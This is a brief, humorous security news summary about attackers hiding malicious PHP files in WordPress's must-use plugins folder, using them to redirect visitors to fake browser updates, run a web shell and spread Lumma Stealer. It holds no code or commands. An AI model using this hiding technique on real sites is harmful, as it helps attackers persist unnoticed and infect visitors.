WordPress Woes: Hackers Hide in Plain Sight with “Mu-Plugins” Trickery!
Threat actors are taking a page from WordPress’s playbook, using the mu-plugins directory to hide malicious code. These must-use plugins run automatically, making them perfect for sneaky hackers, who exploit this feature to redirect users to fake sites and wreak digital havoc. It’s like a bad magic trick, minus the rabbit.
Hot Take:
Who knew that hiding malware could be as easy as tucking it away in WordPress’s version of the sock drawer? Looks like the mu-plugins directory just became the hottest real estate for cybercriminals looking to sneak their malicious antics past unsuspecting site owners. Time to step up those security checks, folks, because it seems like even our plugins are plotting against us!
Key Points:
- The “mu-plugins” directory in WordPress is being exploited by hackers to hide malicious code.
- Three rogue PHP codes identified: redirect.php, index.php (web shell), and custom-js-loader.php.
- Redirect.php disguises as browser updates to trick users into installing malware.
- Threat actors also use hacked WordPress sites for other malicious activities like spreading the Lumma Stealer malware.
- Exploited vulnerabilities often stem from outdated plugins, compromised credentials, and server misconfigurations.
Already a member? Log in here